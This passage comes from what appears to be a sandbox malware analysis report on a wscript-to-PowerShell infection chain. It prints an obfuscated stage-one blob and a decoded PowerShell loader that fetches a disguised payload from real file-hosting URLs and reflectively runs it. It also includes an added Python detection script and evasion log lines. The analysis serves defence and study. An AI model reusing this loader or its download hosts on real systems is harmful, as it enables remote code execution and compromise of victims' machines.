Q$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        Source: GdGXG0bnxH.exe | Static PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Code function: 4_2_00007FF7E6E830EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,4_2_00007FF7E6E830EC
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Code function: 4_2_00007FF7E6E81684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,4_2_00007FF7E6E81684
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Registry value created or modified (4 occurrences): HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
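The Sigma hits in the signature overview (script interpreter from a suspicious folder, Base64 FromBase64String, reversed commands, download from a hardcoded list, WScript starting PowerShell) all correspond to features visible in the two command lines of this section. The Python below is an added example, not a vendor or Joe Sandbox rule: it scores process-creation records, with fields named after Sysmon Event ID 1, against those features, so that the chain alerts while an ordinary hidden -EncodedCommand does not. The weights and threshold are my choices; the four events, the example.invalid and example.org strings and the stage-1 blob are constructed here, not taken from the report.

```python
"""Scoring triage for the wscript.exe -> powershell.exe chain in this report.
Added example: the signals, weights and threshold are mine, not a Joe Sandbox or
Sigma rule, and every event below is constructed to look like a Sysmon Event ID 1."""
import base64
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]  # image, parent_image, command_line

B64ISH_RUN = re.compile(r"[A-Za-z0-9+/$]{64,}")
SINGLE_QUOTED = re.compile(r"'([^']*)'")
URL_PATH = re.compile(r"^(https?://)?[a-z0-9.-]+\.[a-z]{2,}/", re.I)


def dollar_utf16_blob(cmd: str) -> bool:
    """The sample's stage 1 is base64 of UTF-16LE text with 'A' swapped for '$'.
    Genuine base64 never contains '$'; if a long run does, substitute back and
    check whether the odd (high) bytes are almost all zero, i.e. UTF-16LE ASCII."""
    for run in B64ISH_RUN.findall(cmd):
        if run.count("$") < len(run) // 10:
            continue
        b64 = run.replace("$", "A")
        b64 = b64[: len(b64) - len(b64) % 4]
        try:
            data = base64.b64decode(b64)
        except ValueError:
            continue
        high = data[1::2]
        if high and high.count(0) / len(high) > 0.9:
            return True
    return False


def reversed_url_literal(cmd: str) -> bool:
    """A quoted argument that only parses as host/path once reversed, like
    ' txt.IkIhcga/sdaolnwod/.../gro.tekcubtib' in the decoded command line."""
    return any(len(s) >= 8 and URL_PATH.match(s[::-1].strip())
               for s in SINGLE_QUOTED.findall(cmd))


def _lc(e: Event) -> str:
    return e["command_line"].lower()


SIGNALS: List[Tuple[str, int, Callable[[Event], bool]]] = [
    ("script-host parent", 3,
     lambda e: e["parent_image"].lower().endswith(("\\wscript.exe", "\\cscript.exe"))),
    ("hidden window", 1, lambda e: "-windowstyle hidden" in _lc(e)),
    ("reflective load of base64 bytes", 3,
     lambda e: "frombase64string" in _lc(e) and "reflection.assembly]::load" in _lc(e)),
    ("shuffled hardcoded download list", 2,
     lambda e: "get-random" in _lc(e) and ".downloaddata(" in _lc(e)),
    ("$-substituted UTF-16 base64", 3, lambda e: dollar_utf16_blob(e["command_line"])),
    ("reversed URL literal", 2, lambda e: reversed_url_literal(e["command_line"])),
]
ALERT_THRESHOLD = 5


def score(event: Event) -> Tuple[int, List[str]]:
    """Total weight of matching signals and their names, for PowerShell images only."""
    if not event["image"].lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return 0, []
    hits = [(name, w) for name, w, pred in SIGNALS if pred(event)]
    return sum(w for _, w in hits), [name for name, _ in hits]


def alerts(events: List[Event]) -> List[int]:
    """Indices of events at or above the threshold."""
    return [i for i, e in enumerate(events) if score(e)[0] >= ALERT_THRESHOLD]


# Constructed stage-1 blob, built the way the sample's author did it.
_STAGE1 = "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iex 'stage2'"
STAGE1_BLOB = base64.b64encode(_STAGE1.encode("utf-16-le")).decode().replace("A", "$")

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS: List[Event] = [  # constructed, not from the report
    {"image": PS, "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": f"powershell.exe \"$sodigo = '{STAGE1_BLOB}'\" -windowstyle hidden"},
    {"image": PS, "parent_image": PS,
     "command_line": "powershell.exe \"$links = @('https://example.invalid/a.jpg'); "
                     "$u = Get-Random -InputObject $links -Count 1; "
                     "$d = (New-Object Net.WebClient).DownloadData($u); "
                     "$asm = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($t)); "
                     "$asm.GetType('x').GetMethod('y').Invoke($null, [object[]](' txt.a/sdaolnwod/gro.elpmaxe', '0'))\" "
                     "-windowstyle hidden"},
    {"image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe Get-ChildItem C:\Temp | Measure-Object"},
    {"image": PS, "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": "powershell.exe -WindowStyle Hidden -EncodedCommand RwBlAHQALQBEAGEAdABlAA=="},
]

if __name__ == "__main__":
    for i, e in enumerate(EVENTS):
        total, hits = score(e)
        print(i, e["parent_image"].rsplit("\\", 1)[-1], total, hits)
    print("alerting events:", alerts(EVENTS))
```

The '$'-blob check is the one worth keeping even if the rest is tuned away: a plain -EncodedCommand (event 3) never trips it because real base64 contains no '$', while the sample's first stage scores on that signal alone before the parent process is even considered.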

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened (4 occurrences): C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened (3 occurrences): C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (126 occurrences)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1003
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2460
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3884
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5924
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCheck user administrative privileges: GetTokenInformation,
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep count: 3884 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep count: 5924 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -11068046444225724s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E8204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_00007FF7E6E8204C
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E864E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,4_2_00007FF7E6E864E4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
        Source: wscript.exe, 00000008.00000002.1287840296.0000024097ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}h
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E830EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,4_2_00007FF7E6E830EC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E88790 SetUnhandledExceptionFilter,4_2_00007FF7E6E88790
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E88494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF7E6E88494

        HIPS / PFW / Operating System Protection Evasion

        Source: Yara matchFile source: amsi64_7548.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7412, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
